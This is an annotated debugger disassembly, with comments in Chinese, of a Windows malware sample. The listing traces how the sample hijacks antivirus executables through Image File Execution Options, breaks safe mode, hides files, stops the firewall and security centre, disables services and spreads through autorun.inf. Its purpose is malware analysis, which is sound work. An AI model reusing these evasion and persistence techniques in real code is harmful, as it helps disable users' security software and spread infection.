00405238 |. BA 03000000 mov edx,3
0040523D |. E8 A6E4FFFF call down.004036E8
00405242 |. 8B45 E0 mov eax,[local.8] ; "CLSID\{4ED44634-4634-ED47-34ED-634D4634ED47}\InProcServer32")
00405245 |. E8 DEE5FFFF call down.00403828
0040524A |. 8BD0 mov edx,eax
0040524C |. B9 24534000 mov ecx,down.00405324
00405251 |. B8 00000080 mov eax,80000000
00405256 |. E8 09F5FFFF call down.00404764 ; F7溜达一下,有动作了,创建自启动
0040525B |. 68 30534000 push down.00405330 ; ASCII "CLSID"
00405260 |. FF75 F8 push [local.2]
00405263 |. 68 40534000 push down.00405340 ; ASCII "\InProcServer32"
00405268 |. 8D45 DC lea eax,[local.9]
0040526B |. BA 03000000 mov edx,3
00405270 |. E8 73E4FFFF call down.004036E8
00405275 |. 8B45 DC mov eax,[local.9] ; "CLSID\{4ED44634-4634-ED47-34ED-634D4634ED47}\InProcServer32")
00405278 |. E8 ABE5FFFF call down.00403828
0040527D |. 50 push eax ; /subkey="CLSID\{4ED44634-4634-ED47-34ED-634D4634ED47}\InProcServer32")
0040527E |. 68 00000080 push 80000000 ; |hKey = HKEY_CLASSES_ROOT
00405283 |. E8 2CEDFFFF call down.00403FB4 ; \RegDeleteKeyA
00405288 |. 8D45 D8 lea eax,[local.10]
0040528B |. 8B4D F8 mov ecx,[local.2]
0040528E |. BA 30534000 mov edx,down.00405330 ; ASCII "CLSID"
00405293 |. E8 DCE3FFFF call down.00403674
00405298 |. 8B45 D8 mov eax,[local.10] ; "CLSID\{4ED44634-4634-ED47-34ED-634D4634ED47}")
0040529B |. E8 88E5FFFF call down.00403828
004052A0 |. 50 push eax ; /subkey="CLSID\{4ED44634-4634-ED47-34ED-634D4634ED47}")
004052A1 |. 68 00000080 push 80000000 ; |hKey = HKEY_CLASSES_ROOT
004052A6 |. E8 09EDFFFF call down.00403FB4 ; \RegDeleteKeyA
00407A4C /$ 55 push ebp ; service,AUTO START
00407A4D |. 8BEC mov ebp,esp
00407A4F |. B9 09000000 mov ecx,9
00407A54 |> 6A 00 /push 0
00407A56 |. 6A 00 |push 0
00407A58 |. 49 |dec ecx
00407A59 |.^ 75 F9 \jnz short down.00407A54
00407A5B |. 53 push ebx
00407A5C |. 56 push esi
00407A5D |. 33D2 xor edx,edx
00407A5F |. 55 push ebp
00407A60 |. 68 337E4000 push down.00407E33
00407A65 |. 64:FF32 push dword ptr fs:[edx]
00407A68 |. 64:8922 mov dword ptr fs:[edx],esp
00407A6B |. 3C 01 cmp al,1
00407A6D |. 0F85 46020000 jnz down.00407CB9
00407A73 |. 8D45 FC lea eax,[local.1]
00407A76 |. 50 push eax ; /pThreadId
00407A77 |. 6A 00 push 0 ; |CreationFlags = 0
00407A79 |. 6A 01 push 1 ; |pThreadParm = 00000001
00407A7B |. 68 2C784000 push down.0040782C ; |ThreadFunction = down.0040782C
00407A80 |. 6A 00 push 0 ; |StackSize = 0
00407A82 |. 6A 00 push 0 ; |pSecurity = NULL
00407A84 |. E8 BBC5FFFF call down.00404044 ; \CreateThread
00407A89 |. BB 58000000 mov ebx,58
00407A8E |. BE 94A24000 mov esi,down.0040A294
00407A93 |> 8D45 F0 /lea eax,[local.4]
00407A96 |. E8 05D4FFFF |call down.00404EA0
00407A9B |. 8B45 F0 |mov eax,[local.4]
00407A9E |. 8D55 F4 |lea edx,[local.3]
00407AA1 |. E8 72D9FFFF |call down.00405418
00407AA6 |. 8B45 F4 |mov eax,[local.3] ; "C:\Program Files\Common Files\Microsoft Shared\MSINFO\4634ED47.dat")
00407AA9 |. E8 7ABDFFFF |call down.00403828
00407AAE |. 50 |push eax ; "C:\Program Files\Common Files\Microsoft Shared\MSINFO\4634ED47.dat")
00407AAF |. 68 487E4000 |push down.00407E48 ; ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
00407AB4 |. FF36 |push dword ptr ds:[esi]
00407AB6 |. 68 9C7E4000 |push down.00407E9C ; ASCII ".exe"
00407ABB |. 8D45 EC |lea eax,[local.5]
00407ABE |. BA 03000000 |mov edx,3
00407AC3 |. E8 20BCFFFF |call down.004036E8
00407AC8 |. 8B45 EC |mov eax,[local.5]
00407ACB |. E8 58BDFFFF |call down.00403828
00407AD0 |. 8BD0 |mov edx,eax
00407AD2 |. B9 A47E4000 |mov ecx,down.00407EA4 ; ASCII "Debugger"
00407AD7 |. B8 02000080 |mov eax,80000002 ; "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe"
00407ADC |. E8 83CCFFFF |call down.00404764
00407AE1 |. 83C6 04 |add esi,4
00407AE4 |. 4B |dec ebx
00407AE5 |.^ 75 AC \jnz short down.00407A93
00407AE7 |. BB 09000000 mov ebx,9
00407AEC |. BE FCA34000 mov esi,down.0040A3FC
00407AF1 |> 8D45 E4 /lea eax,[local.7]
00407AF4 |. E8 A7D3FFFF |call down.00404EA0
00407AF9 |. 8B45 E4 |mov eax,[local.7] ; "C:\Program Files\Common Files\Microsoft Shared\MSINFO\4634ED47.dat")
00407AFC |. 8D55 E8 |lea edx,[local.6]
00407AFF |. E8 14D9FFFF |call down.00405418
00407B04 |. 8B45 E8 |mov eax,[local.6]
00407B07 |. E8 1CBDFFFF |call down.00403828
00407B0C |. 50 |push eax ; "C:\Program Files\Common Files\Microsoft Shared\MSINFO\4634ED47.dat")
00407B0D |. 68 487E4000 |push down.00407E48 ; ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
00407B12 |. FF36 |push dword ptr ds:[esi] ; ASCII "KvXP_1"
00407B14 |. 68 B87E4000 |push down.00407EB8 ; ASCII ".kxp"
00407B19 |. 8D45 E0 |lea eax,[local.8]
00407B1C |. BA 03000000 |mov edx,3
00407B21 |. E8 C2BBFFFF |call down.004036E8
00407B26 |. 8B45 E0 |mov eax,[local.8] ; "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP_1.kxp")
00407B29 |. E8 FABCFFFF |call down.00403828
00407B2E |. 8BD0 |mov edx,eax
00407B30 |. B9 A47E4000 |mov ecx,down.00407EA4 ; ASCII "Debugger"
00407B35 |. B8 02000080 |mov eax,80000002
00407B3A |. E8 25CCFFFF |call down.00404764
00407B3F |. 83C6 04 |add esi,4
00407B42 |. 4B |dec ebx
00407B43 |.^ 75 AC \jnz short down.00407AF1
00407B45 |. BB 03000000 mov ebx,3
00407B4A |. BE 20A44000 mov esi,down.0040A420
00407B4F |> 8D45 D8 /lea eax,[local.10]
00407B52 |. E8 49D3FFFF |call down.00404EA0
00407B57 |. 8B45 D8 |mov eax,[local.10]
00407B5A |. 8D55 DC |lea edx,[local.9]
00407B5D |. E8 B6D8FFFF |call down.00405418
00407B62 |. 8B45 DC |mov eax,[local.9]
00407B65 |. E8 BEBCFFFF |call down.00403828
00407B6A |. 50 |push eax
00407B6B |. 8B0E |mov ecx,dword ptr ds:[esi]
00407B6D |. 8D45 D4 |lea eax,[local.11]
00407B70 |. BA 487E4000 |mov edx,down.00407E48 ; ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" 镜像劫持
00407B75 |. E8 FABAFFFF |call down.00403674
00407B7A |. 8B45 D4 |mov eax,[local.11]
00407B7D |. E8 A6BCFFFF |call down.00403828
00407B82 |. 8BD0 |mov edx,eax ; SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com 镜像劫持
00407B84 |. B9 A47E4000 |mov ecx,down.00407EA4 ; ASCII "Debugger"
00407B89 |. B8 02000080 |mov eax,80000002
00407B8E |. E8 D1CBFFFF |call down.00404764
00407B93 |. 83C6 04 |add esi,4
00407B96 |. 4B |dec ebx
00407B97 |.^ 75 B6 \jnz short down.00407B4F
00407B99 |. B0 01 mov al,1
00407B9B |. E8 EC080000 call down.0040848C
00407BA0 |. BB 03000000 mov ebx,3
00407BA5 |. BE E0A44000 mov esi,down.0040A4E0
00407BAA |> 6A 04 /push 4
00407BAC |. 8B0E |mov ecx,dword ptr ds:[esi]
00407BAE |. 8D45 D0 |lea eax,[local.12]
00407BB1 |. BA C87E4000 |mov edx,down.00407EC8 ; ASCII "SYSTEM\CurrentControlSet\Services" 作者注:创建服务;从循环顶部 push 4 作为写入 Start 的值看(Start=4 对应 SERVICE_DISABLED),更像是把这几个服务设为禁用
00407BB6 |. E8 B9BAFFFF |call down.00403674
00407BBB |. 8B55 D0 |mov edx,[local.12]
00407BBE |. B9 F47E4000 |mov ecx,down.00407EF4 ; ASCII "Start"
00407BC3 |. B8 02000080 |mov eax,80000002
00407BC8 |. E8 6BC9FFFF |call down.00404538 ; F7进去是创建注册表键值
00407BCD |. 83C6 04 |add esi,4
00407BD0 |. 4B |dec ebx
00407BD1 |.^ 75 D7 \jnz short down.00407BAA
00407BD3 |. BB 02000000 mov ebx,2
00407BD8 |. BE 04A54000 mov esi,down.0040A504
00407BDD |> 8B0E /mov ecx,dword ptr ds:[esi]
00407BDF |. 8D45 CC |lea eax,[local.13]
00407BE2 |. BA 047F4000 |mov edx,down.00407F04 ; ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" 自启动
00407BE7 |. E8 88BAFFFF |call down.00403674
00407BEC |. 8B55 CC |mov edx,[local.13]
00407BEF |. 33C9 |xor ecx,ecx
00407BF1 |. B8 02000080 |mov eax,80000002
00407BF6 |. E8 91CAFFFF |call down.0040468C ; F7进去删除一些注册表键值
00407BFB |. 83C6 04 |add esi,4
00407BFE |. 4B |dec ebx
00407BFF |.^ 75 DC \jnz short down.00407BDD
00407C01 |. 33C9 xor ecx,ecx
00407C03 |. BA 4C7F4000 mov edx,down.00407F4C ; ASCII "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}" 修改安全模式(0040468C 上面标注为删除注册表键值,这里删的是 SafeBoot\Minimal 下的这个键)
00407C08 |. B8 02000080 mov eax,80000002
00407C0D |. E8 7ACAFFFF call down.0040468C
00407C12 |. 33C9 xor ecx,ecx
00407C14 |. BA B07F4000 mov edx,down.00407FB0 ; ASCII "SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}" 同上,删除 SafeBoot\Network 下的键,修改安全模式
00407C19 |. B8 02000080 mov eax,80000002
00407C1E |. E8 69CAFFFF call down.0040468C
00407C23 |. 6A 02 push 2
00407C25 |. B9 14804000 mov ecx,down.00408014 ; ASCII "Hidden"
00407C2A |. BA 24804000 mov edx,down.00408024 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" 隐藏文件夹
00407C2F |. B8 01000080 mov eax,80000001
00407C34 |. E8 FFC8FFFF call down.00404538 ; F7 进去 对注册表的操作
00407C39 |. 6A 00 push 0
00407C3B |. B9 68804000 mov ecx,down.00408068 ; ASCII "CheckedValue"
00407C40 |. BA 80804000 mov edx,down.00408080 ; ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL"隐藏文件夹
00407C45 |. B8 02000080 mov eax,80000002
00407C4A |. E8 E9C8FFFF call down.00404538
00407C4F |. B8 DC804000 mov eax,down.004080DC ; ASCII "SharedAccess"
00407C54 |. E8 3F0A0000 call down.00408698 ; F7进去 关闭防火墙服务
00407C59 |. B8 F4804000 mov eax,down.004080F4 ; ASCII "wscsvc"
00407C5E |. E8 350A0000 call down.00408698 ; 关闭监视系统安全设置和配置
{
004086C2 |. E8 41DAFFFF call down.00406108 ; jmp 到 advapi32.OpenSCManagerA
004086C7 |. 8BF0 mov esi,eax
004086C9 |. 68 FF010F00 push 0F01FF
004086CE |. 8B45 FC mov eax,[local.1]
004086D1 |. E8 52B1FFFF call down.00403828
004086D6 |. 50 push eax
004086D7 |. 56 push esi
004086D8 |. E8 33DAFFFF call down.00406110 ; jmp 到 advapi32.OpenServiceA
004086DD |. 8BD8 mov ebx,eax
004086DF |. 85DB test ebx,ebx
004086E1 |. 76 0C jbe short down.004086EF
004086E3 |> 8D45 E0 lea eax,[local.8]
004086E6 |. 50 push eax
004086E7 |. 6A 01 push 1
004086E9 |. 53 push ebx
004086EA |. E8 11DAFFFF call down.00406100 ; jmp 到 advapi32.ControlService
004086EF |> 53 push ebx
004086F0 |. E8 03DAFFFF call down.004060F8 ; jmp 到 advapi32.CloseServiceHandle
004086F5 |. 56 push esi
004086F6 |. E8 FDD9FFFF call down.004060F8 ; jmp 到 advapi32.CloseServiceHandle
}
00407C63 |. B0 01 mov al,1
00407C65 |. E8 3AFAFFFF call down.004076A4 ; F7进去瞧瞧。。对防护软件的处理
{
004076D6 |. E8 EDDCFFFF |call down.004053C8 ; 通过(kernel32.GetSystemDirectoryA)获取系统目录
004076DB |. FF75 F0 |push [local.4] ; "C:\WINDOWS\system32")
004076DE |. FF33 |push dword ptr ds:[ebx>; "KvNative"
004076E0 |. 68 08784000 |push down.00407808 ; ASCII ".exe"
004076E5 |. 8D45 FC |lea eax,[local.1]
004076E8 |. BA 03000000 |mov edx,3
004076ED |. E8 F6BFFFFF |call down.004036E8
004076F2 |. 8D45 EC |lea eax,[local.5]
004076F5 |. E8 CEDCFFFF |call down.004053C8 ; 通过(kernel32.GetSystemDirectoryA)获取系统目录
004076FA |. FF75 EC |push [local.5] ; "C:\WINDOWS\system32")
004076FD |. FF33 |push dword ptr ds:[ebx>; "KvNative"
004076FF |. 68 18784000 |push down.00407818 ; ASCII ".bak"
00407704 |. 8D45 F8 |lea eax,[local.2]
00407707 |. BA 03000000 |mov edx,3
0040770C |. E8 D7BFFFFF |call down.004036E8
00407711 |. 8B45 FC |mov eax,[local.1] ; "C:\WINDOWS\system32\KvNative.exe")
00407714 |. E8 0FC1FFFF |call down.00403828
00407719 |. 8BF8 |mov edi,eax ; "C:\WINDOWS\system32\KvNative.exe")
0040771B |. 57 |push edi ; /filename="C:\WINDOWS\system32\KvNative.exe")
0040771C |. E8 5BC9FFFF |call down.0040407C ; \GetFileAttributesA
00407721 |. 83F8 FF |cmp eax,-1
00407724 |. 74 1D |je short down.00407743
00407726 |. 8B45 F8 |mov eax,[local.2]
00407729 |. E8 FAC0FFFF |call down.00403828
0040772E |. 50 |push eax ; /FileName
0040772F |. E8 18C9FFFF |call down.0040404C ; \DeleteFileA
00407734 |. 8B45 F8 |mov eax,[local.2]
00407737 |. E8 ECC0FFFF |call down.00403828
0040773C |. 50 |push eax ; /NewName
0040773D |. 57 |push edi ; |ExistingName
0040773E |. E8 A1C9FFFF |call down.004040E4 ; \MoveFileA
00407743 |> 83C3 04 |add ebx,4
00407746 |. 4E |dec esi
00407747 |.^ 75 8A \jnz short down.004076D>; 这里是个循环处理安全防护软件
}
00407C6A |. B0 01 mov al,1
00407C6C |. E8 87050000 call down.004081F8 ; F7进去瞧瞧。。对防护软件的处理
{
00408225 |. BA D8834000 mov edx,down.004083D8 ; ASCII "SoftWare\Microsoft"
0040822A |. E8 19B3FFFF call down.00403548
0040822F |. 8D45 D8 lea eax,[local.10]
00408232 |. BA F4834000 mov edx,down.004083F4 ; ASCII "Windows\CurrentVersion\Run"
00408237 |. E8 F4B3FFFF call down.00403630
....
....
....
0040826A |. E8 B9B5FFFF |call down.00403828
0040826F |. 50 |push eax ; |Subkey
00408270 |. 8B45 FC |mov eax,[local.1] ; |
00408273 |. 50 |push eax ; |hKey
00408274 |. E8 6BBDFFFF |call down.00403FE4 ; \RegOpenKeyExA
00408279 |. 85C0 |test eax,eax
0040827B |. 0F85 0C010000 |jnz down.0040838D
00408281 |. 6A 00 |push 0 ; /pLastWrite = NULL
00408283 |. 6A 00 |push 0 ; |pSecurity = NULL
00408285 |. 6A 00 |push 0 ; |pMaxValueLength = NULL
00408287 |. 8D45 E4 |lea eax,[local.7] ; |
0040828A |. 50 |push eax ; |pMaxValueNameLength
0040828B |. 8D45 E8 |lea eax,[local.6] ; |
0040828E |. 50 |push eax ; |pnValues
0040828F |. 6A 00 |push 0 ; |pMaxClassLength = NULL
00408291 |. 6A 00 |push 0 ; |pMaxSubkeyLength = NULL
00408293 |. 8D45 EC |lea eax,[local.5] ; |
00408296 |. 50 |push eax ; |pnSubkeys
00408297 |. 6A 00 |push 0 ; |Reserved = NULL
00408299 |. 6A 00 |push 0 ; |pClassCount = NULL
0040829B |. 6A 00 |push 0 ; |Class = NULL
0040829D |. 8B45 F8 |mov eax,[local.2] ; |
004082A0 |. 50 |push eax ; |hKey
004082A1 |. E8 46BDFFFF |call down.00403FEC ; \RegQueryInfoKeyA
004082A6 |. 85C0 |test eax,eax
004082A8 |. 0F85 D6000000 |jnz down.00408384
004082AE |. 8B55 E4 |mov edx,[local.7]
004082B1 |. 42 |inc edx
004082B2 |. 8D45 E0 |lea eax,[local.8]
004082B5 |. E8 9EB6FFFF |call down.00403958
004082BA |. 837D E8 00 |cmp [local.6],0
004082BE |. 0F84 BE000000 |je down.00408382
004082C4 |. 8B45 E8 |mov eax,[local.6]
004082C7 |. 48 |dec eax
004082C8 |. 85C0 |test eax,eax
004082CA |. 0F82 B2000000 |jb down.00408382
004082D0 |. 40 |inc eax
004082D1 |. 8945 D4 |mov [local.11],eax
004082D4 |. C745 F4 00000>|mov [local.3],0
004082DB |> 8B45 E4 |/mov eax,[local.7]
004082DE |. 40 ||inc eax
004082DF |. 8945 F0 ||mov [local.4],eax
004082E2 |. 6A 00 ||push 0
004082E4 |. 6A 00 ||push 0
004082E6 |. 6A 00 ||push 0
004082E8 |. 6A 00 ||push 0
004082EA |. 8D45 F0 ||lea eax,[local.4]
004082ED |. 50 ||push eax
004082EE |. 8B45 E0 ||mov eax,[local.8]
004082F1 |. E8 32B5FFFF ||call down.00403828
004082F6 |. 50 ||push eax ; |Value
004082F7 |. 8B45 F4 ||mov eax,[local.3] ; |
004082FA |. 50 ||push eax ; |Index
004082FB |. 8B45 F8 ||mov eax,[local.2] ; |
004082FE |. 50 ||push eax ; |hKey
004082FF |. E8 C8BCFFFF ||call down.00403FCC ; \RegEnumValueA
00408304 |. 8D45 DC ||lea eax,[local.9] ; 枚举自启动都有啥
00408307 |. 50 ||push eax
00408308 |. 8B45 E0 ||mov eax,[local.8]
0040830B |. E8 18B5FFFF ||call down.00403828
00408310 |. 50 ||push eax
00408311 |. 8B45 D8 ||mov eax,[local.10]
00408314 |. E8 0FB5FFFF ||call down.00403828
00408319 |. 8BD0 ||mov edx,eax ; "SoftWare\Microsoft\Windows\CurrentVersion\Run")
0040831B |. 8B45 FC ||mov eax,[local.1]
....
....
....
00408382 |> B3 01 |mov bl,1
00408384 |> 8B45 F8 |mov eax,[local.2]
00408387 |. 50 |push eax ; /hKey
00408388 |. E8 17BCFFFF |call down.00403FA4 ; \RegCloseKey
0040838D |> 47 |inc edi
0040838E |. 83FF 02 |cmp edi,2
00408391 |.^ 0F85 AEFEFFFF \jnz down.00408245 ; 循环处理安全防护软件的启动项
}
00407C71 |. BB 06000000 mov ebx,6
00407C76 |. BE ECA44000 mov esi,down.0040A4EC
00407C7B |> 68 04814000 /push down.00408104 ; ASCII "CLSID"
00407C80 |. FF36 |push dword ptr ds:[esi]
00407C82 |. 68 14814000 |push down.00408114 ; ASCII "\InprocServer32"
00407C87 |. 8D45 C8 |lea eax,[local.14]
00407C8A |. BA 03000000 |mov edx,3
00407C8F |. E8 54BAFFFF |call down.004036E8
00407C94 |. 8B45 C8 |mov eax,[local.14]
00407C97 |. E8 8CBBFFFF |call down.00403828
00407C9C |. 50 |push eax ; /subkey= CLSID\{32CD708B-60A7-4C00-9377-D73EAA495F0F}\InprocServer32
00407C9D |. 68 00000080 |push 80000000 ; |hKey = HKEY_CLASSES_ROOT
00407CA2 |. E8 0DC3FFFF |call down.00403FB4 ; \RegDeleteKeyA
00407CA7 |. 83C6 04 |add esi,4
00407CAA |. 4B |dec ebx
00407CAB |.^ 75 CE \jnz short down.00407C7B
00407CAD |. B0 01 mov al,1
00407CAF |. E8 6C0A0000 call down.00408720
00407CB4 |. E9 5F010000 jmp down.00407E18
00407CB9 |> 8B45 F8 mov eax,[local.2]
00407CBC |. BA 2C814000 mov edx,down.0040812C ; ASCII " "
00407CC1 |. E8 AEBAFFFF call down.00403774
00407CC6 |. 75 07 jnz short down.00407CCF
00407CC8 |. 6A 00 push 0 ; /hKey = 0
00407CCA |. E8 05C3FFFF call down.00403FD4 ; \RegFlushKey
00407CCF |> BB 58000000 mov ebx,58
00407CD4 |. BE 94A24000 mov esi,down.0040A294
00407CD9 |> 68 487E4000 /push down.00407E48 ; ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
00407CDE |. FF36 |push dword ptr ds:[esi]
00407CE0 |. 68 9C7E4000 |push down.00407E9C ; ASCII ".exe"
00407CE5 |. 8D45 C4 |lea eax,[local.15]
00407CE8 |. BA 03000000 |mov edx,3
00407CED |. E8 F6B9FFFF |call down.004036E8
00407CF2 |. 8B45 C4 |mov eax,[local.15]
00407CF5 |. E8 2EBBFFFF |call down.00403828
00407CFA |. 50 |push eax ; /Subkey
00407CFB |. 68 02000080 |push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00407D00 |. E8 AFC2FFFF |call down.00403FB4 ; \RegDeleteKeyA
00407D05 |. 83C6 04 |add esi,4
00407D08 |. 4B |dec ebx
00407D09 |.^ 75 CE \jnz short down.00407CD9
00407D0B |. BB 09000000 mov ebx,9
00407D10 |. BE FCA34000 mov esi,down.0040A3FC
00407D15 |> 68 487E4000 /push down.00407E48 ; ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
00407D1A |. FF36 |push dword ptr ds:[esi]
00407D1C |. 68 B87E4000 |push down.00407EB8 ; ASCII ".kxp"
00407D21 |. 8D45 C0 |lea eax,[local.16]
00407D24 |. BA 03000000 |mov edx,3
00407D29 |. E8 BAB9FFFF |call down.004036E8
00407D2E |. 8B45 C0 |mov eax,[local.16]
00407D31 |. E8 F2BAFFFF |call down.00403828
00407D36 |. 50 |push eax ; /Subkey
00407D37 |. 68 02000080 |push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00407D3C |. E8 73C2FFFF |call down.00403FB4 ; \RegDeleteKeyA
00407D41 |. 83C6 04 |add esi,4
00407D44 |. 4B |dec ebx
00407D45 |.^ 75 CE \jnz short down.00407D15
00407D47 |. BB 03000000 mov ebx,3
00407D4C |. BE 20A44000 mov esi,down.0040A420
00407D51 |> 8B0E /mov ecx,dword ptr ds:[esi]
00407D53 |. 8D45 BC |lea eax,[local.17]
00407D56 |. BA 487E4000 |mov edx,down.00407E48 ; ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
00407D5B |. E8 14B9FFFF |call down.00403674
00407D60 |. 8B45 BC |mov eax,[local.17]
00407D63 |. E8 C0BAFFFF |call down.00403828
00407D68 |. 50 |push eax ; /Subkey
00407D69 |. 68 02000080 |push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00407D6E |. E8 41C2FFFF |call down.00403FB4 ; \RegDeleteKeyA
00407D73 |. 83C6 04 |add esi,4
00407D76 |. 4B |dec ebx
00407D77 |.^ 75 D8 \jnz short down.00407D51
00407D79 |. 33C0 xor eax,eax
00407D7B |. E8 0C070000 call down.0040848C
00407D80 |. BB 03000000 mov ebx,3
00407D85 |. BE E0A44000 mov esi,down.0040A4E0
00407D8A |> 6A 03 /push 3
00407D8C |. 8B0E |mov ecx,dword ptr ds:[esi]
00407D8E |. 8D45 B8 |lea eax,[local.18]
00407D91 |. BA C87E4000 |mov edx,down.00407EC8 ; ASCII "SYSTEM\CurrentControlSet\Services"
00407D96 |. E8 D9B8FFFF |call down.00403674
00407D9B |. 8B55 B8 |mov edx,[local.18]
00407D9E |. B9 F47E4000 |mov ecx,down.00407EF4 ; ASCII "Start"
00407DA3 |. B8 02000080 |mov eax,80000002
00407DA8 |. E8 8BC7FFFF |call down.00404538
00407DAD |. 83C6 04 |add esi,4
00407DB0 |. 4B |dec ebx
00407DB1 |.^ 75 D7 \jnz short down.00407D8A
00407DB3 |. 68 30814000 push down.00408130 ; ASCII "DiskDrive"
00407DB8 |. B9 3C814000 mov ecx,down.0040813C
00407DBD |. BA 40814000 mov edx,down.00408140 ; ASCII "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}"
00407DC2 |. B8 02000080 mov eax,80000002
00407DC7 |. E8 98C9FFFF call down.00404764
00407DCC |. 68 30814000 push down.00408130 ; ASCII "DiskDrive"
00407DD1 |. B9 3C814000 mov ecx,down.0040813C
00407DD6 |. BA 9C814000 mov edx,down.0040819C ; ASCII "SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}"
00407DDB |. B8 02000080 mov eax,80000002
00407DE0 |. E8 7FC9FFFF call down.00404764
00407DE5 |. 6A 01 push 1
00407DE7 |. B9 14804000 mov ecx,down.00408014 ; ASCII "Hidden"
00407DEC |. BA 24804000 mov edx,down.00408024 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" 自启动
00407DF1 |. B8 01000080 mov eax,80000001
00407DF6 |. E8 3DC7FFFF call down.00404538
00407DFB |. 6A 01 push 1
00407DFD |. B9 68804000 mov ecx,down.00408068 ; ASCII "CheckedValue"
00407E02 |. BA 80804000 mov edx,down.00408080 ; ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" 设置隐藏文件是否可见
00408CAF |. 6A 00 |push 0 ; /lParam = 0
00408CB1 |. 6A 00 |push 0 ; |wParam = 0
00408CB3 |. 6A 1A |push 1A ; |Message = WM_WININICHANGE
00408CB5 |. 68 FFFF0000 |push 0FFFF ; |hWnd = HWND_BROADCAST
00408CBA |. E8 BDB4FFFF |call down.0040417C ; \SendMessageA 发送消息
00408CBF |> 6A 00 |push 0 ; /lParam = 0
00408CC1 |. 6A 00 |push 0 ; |wParam = 0
00408CC3 |. 6A 1A |push 1A ; |Message = WM_WININICHANGE
00408CC5 |. 68 FFFF0000 |push 0FFFF ; |hWnd = HWND_BROADCAST
00408CCA |. E8 A5B4FFFF |call down.00404174 ; \PostMessageA
00408A4D |> /8D45 D0 /lea eax,[local.12]
00408A50 |. |8A13 |mov dl,byte ptr ds:[ebx]
00408A52 |. |E8 79ABFFFF |call down.004035D0
00408A57 |. |8B55 D0 |mov edx,[local.12]
00408A5A |. |8D45 FC |lea eax,[local.1]
00408A5D |. |B9 348B4000 |mov ecx,down.00408B34 ; ASCII ":"
00408A62 |. |E8 0DACFFFF |call down.00403674
00408A67 |. |8D45 F4 |lea eax,[local.3]
00408A6A |. |B9 408B4000 |mov ecx,down.00408B40 ; ASCII "AutoRun.inf"
00408A6F |. |8B55 FC |mov edx,[local.1]
00408A72 |. |E8 FDABFFFF |call down.00403674
00408A77 |. |8D45 F0 |lea eax,[local.4]
00408A7A |. |8B4D F8 |mov ecx,[local.2]
00408A7D |. |8B55 FC |mov edx,[local.1]
00408A80 |. |E8 EFABFFFF |call down.00403674
00408A85 |. |8B45 FC |mov eax,[local.1]
00408A88 |. |E8 9BADFFFF |call down.00403828
00408A8D |. |50 |push eax ; /RootPathName
00408A8E |. |E8 E1B5FFFF |call down.00404074 ; \GetDriveTypeA
00408A93 |. |66:83F8 03 |cmp ax,3
00408A97 |. |75 30 |jnz short down.00408AC9
00408A99 |. |6A 00 |push 0
00408A9B |. |8B45 F4 |mov eax,[local.3]
00408A9E |. |E8 85ADFFFF |call down.00403828
00408AA3 |. |8BF8 |mov edi,eax ; |
00408AA5 |. |57 |push edi ; |filename="D:\AutoRun.inf")
00408AA6 |. |E8 69B6FFFF |call down.00404114 ; \SetFileAttributesA
00408AAB |. |57 |push edi ; /FileName
00408AAC |. |E8 9BB5FFFF |call down.0040404C ; \DeleteFileA
00408AB1 |. |6A 00 |push 0
00408AB3 |. |8B45 F0 |mov eax,[local.4]
00408AB6 |. |E8 6DADFFFF |call down.00403828
00408ABB |. |8BF8 |mov edi,eax ; |
00408ABD |. |57 |push edi ; |FileName
00408ABE |. |E8 51B6FFFF |call down.00404114 ; \SetFileAttributesA
00408AC3 |. |57 |push edi ; /FileName
00408AC4 |. |E8 83B5FFFF |call down.0040404C ; \DeleteFileA
00408AC9 |> |43 |inc ebx
00408ACA |. |4E |dec esi
00408ACB |.^\75 80 \jnz short down.00408A4D ; 循环遍历每个盘符,删除旧的 autorun.inf 后重新感染
00405492 |. 6A 00 push 0 ; /lParam = 0
00405494 |. 6A 00 push 0 ; |wParam = 0
00405496 |. 6A 1A push 1A ; |Message = WM_WININICHANGE
00405498 |. 68 FFFF0000 push 0FFFF ; |hWnd = HWND_BROADCAST
0040549D |. E8 DAECFFFF call down.0040417C ; \SendMessageA
004054A2 |> 8D85 68FFFFFF lea eax,[local.38]
004054A8 |. 50 push eax ; /pVersionInformation
004054A9 |. E8 06ECFFFF call down.004040B4 ; \GetVersionExA 获得系统版本
00405525 |. E8 4EFEFFFF call down.00405378 ; 获取系统目录
0040552A |. 8B95 28FEFFFF mov edx,[local.118] ; (ASCII "C:\WINDOWS")
00405530 |. 8D45 FC lea eax,[local.1]
00405533 |. B9 A8564000 mov ecx,down.004056A8 ; ASCII "Deleteme.bat"
00405538 |. E8 37E1FFFF call down.00403674
0040553D |. 8D95 24FEFFFF lea edx,[local.119]
00405543 |. 33C0 xor eax,eax
00405545 |. E8 1EEFFFFF call down.00404468
0040554A |. 8B85 24FEFFFF mov eax,[local.119]
00405550 |. 8D55 F8 lea edx,[local.2]
00405553 |. E8 C0FEFFFF call down.00405418
00405558 |. 6A 00 push 0
0040555A |. 8B45 F8 mov eax,[local.2]
